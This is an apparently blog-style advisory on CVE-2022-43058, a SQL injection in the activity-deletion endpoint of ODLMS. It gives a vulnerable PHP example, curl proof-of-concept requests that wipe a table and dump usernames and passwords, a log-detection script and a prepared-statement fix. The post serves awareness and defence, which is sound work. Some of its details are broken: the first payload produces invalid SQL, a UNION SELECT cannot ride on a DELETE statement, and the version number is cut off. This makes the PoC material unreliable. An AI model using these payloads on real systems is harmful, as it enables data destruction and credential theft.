In October 2022, a critical SQL injection vulnerability was identified in the Online Diagnostic Lab Management System (ODLMS) v1.. Tracked as CVE-2022-43058, this vulnerability allows a remote attacker to execute arbitrary SQL commands on the backend database. The vulnerability lies in the way the system processes the id parameter in the delete_activity function, potentially exposing sensitive information or enabling data manipulation.
This post digs into the technical details, showcases proof-of-concept code, provides references, and explains how the exploit works using simple terms.
- Version: 1.
- Vulnerable Path: /odlms/classes/Master.php?f=delete_activity
Technical Background
SQL injection is a well-known attack vector that occurs when user input is not properly sanitized and is directly included in a SQL query. When this happens, an attacker can manipulate the database query by sending specially crafted parameter values.
In the case of ODLMS v1., the following API call is vulnerable:

```
/odlms/classes/Master.php?f=delete_activity&id={USER_INPUT}
```
The id parameter is directly used in an SQL statement without sanitization, opening the door for attackers.
Vulnerable Code (Simplified Example)
While the exact code inside Master.php is not public, vulnerable PHP scripts typically look like this:
```php
// Potential vulnerable code inside Master.php (simplified; $conn is an open mysqli connection)
if ($_GET['f'] == 'delete_activity') {
    $id = $_GET['id'];
    // Unsafe: $id is used directly in the SQL statement
    $sql = "DELETE FROM activities WHERE id = $id";
    $result = mysqli_query($conn, $sql);
    // ...
}
```
This code does not validate or escape $id, so if an attacker sends id=1 OR 1=1, the query becomes:
```sql
DELETE FROM activities WHERE id = 1 OR 1=1
```
This will delete all records in the activities table.
Proof of Concept (PoC)
An attacker can exploit this with a simple browser or tools like curl or Burp Suite.
PoC with Curl

```bash
curl "http://targetsite.com/odlms/classes/Master.php?f=delete_activity&id=%20OR%201=1"
```

Suppose someone wants to dump the first username in the users table (table name assumed):

```bash
curl "http://targetsite.com/odlms/classes/Master.php?f=delete_activity&id=%20UNION%20SELECT%201,username,password%20FROM%20users%20LIMIT%201--+"
```
Depending on the SQL error messages or how output is handled, information can be revealed.
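Because the endpoint only ever expects a numeric id, attempts against it stand out in the web server log: any delete_activity request whose decoded id is not a plain integer is worth alerting on. The following detection script is an added example for this post, not code from ODLMS; the access-log lines are constructed to mirror the requests shown above, and the log format is assumed to be the common Apache/Nginx combined layout.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic). Two of them carry the
# non-numeric id values discussed above; the fourth hits a different function.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Nov/2022:21:15:01 +0000] "GET /odlms/classes/Master.php?f=delete_activity&id=7 HTTP/1.1" 200 12
10.0.0.9 - - [09/Nov/2022:21:15:03 +0000] "GET /odlms/classes/Master.php?f=delete_activity&id=%20OR%201=1 HTTP/1.1" 200 12
10.0.0.9 - - [09/Nov/2022:21:15:04 +0000] "GET /odlms/classes/Master.php?f=delete_activity&id=%20UNION%20SELECT%201,username,password%20FROM%20users%20LIMIT%201--+ HTTP/1.1" 500 0
10.0.0.5 - - [09/Nov/2022:21:15:05 +0000] "GET /odlms/classes/Master.php?f=get_activity&id=7 HTTP/1.1" 200 400
"""

# Combined log format: client ip, timestamp, quoted request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)
INT_RE = re.compile(r'^[0-9]+$')  # the only shape a legitimate id should have


def parse_line(line):
    """Split one log line into ip, status, path and the decoded f/id query values."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    # parse_qs percent-decodes values and turns '+' into a space, so the
    # attacker's encoding tricks are normalised before we inspect the id.
    qs = parse_qs(parts.query, keep_blank_values=True)
    return {
        'ip': m.group('ip'),
        'status': int(m.group('status')),
        'path': parts.path,
        'f': qs.get('f', [''])[0],
        'id': qs.get('id', [''])[0],
    }


def suspicious_ids(log_text):
    """Return (ip, decoded id) for delete_activity calls whose id is not a bare integer."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec['path'].endswith('/classes/Master.php'):
            continue
        if rec['f'] != 'delete_activity':
            continue
        if not INT_RE.match(rec['id']):
            hits.append((rec['ip'], rec['id']))
    return hits


if __name__ == '__main__':
    for ip, bad_id in suspicious_ids(SAMPLE_LOG):
        print(f"ALERT {ip} delete_activity id={bad_id!r}")
```

The same integer allow-list is what the intval() call in the fix below enforces server-side; the log check lets you find attempts that reached an unpatched instance.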
Example Fix (PHP - MySQLi Prepared Statement)
```php
if ($_GET['f'] == 'delete_activity') {
    // Coerce the input to an integer first; anything non-numeric becomes 0
    $id = intval($_GET['id']);
    // Prepared statement: the value is bound as data, never spliced into the SQL text
    $stmt = $conn->prepare("DELETE FROM activities WHERE id = ?");
    $stmt->bind_param("i", $id);
    $stmt->execute();
    $stmt->close();
}
```
References
- NVD – CVE-2022-43058
- Exploit Database Entry (if/when available)
- Basics of SQL Injection – OWASP
- How to Prevent SQL Injection in PHP
Conclusion
CVE-2022-43058 is a dangerous SQL injection vulnerability in ODLMS v1.’s activity deletion endpoint. Even basic exploitation can lead to full database compromise or total data loss. All affected users should update and sanitize their code right away.
Always treat user input as untrusted and use best practices like prepared statements to prevent SQL injection.
*If you found this guide helpful, consider sharing it to raise awareness about secure coding!*
Timeline
Published on: 11/09/2022 21:15:00 UTC
Last modified on: 11/10/2022 14:22:00 UTC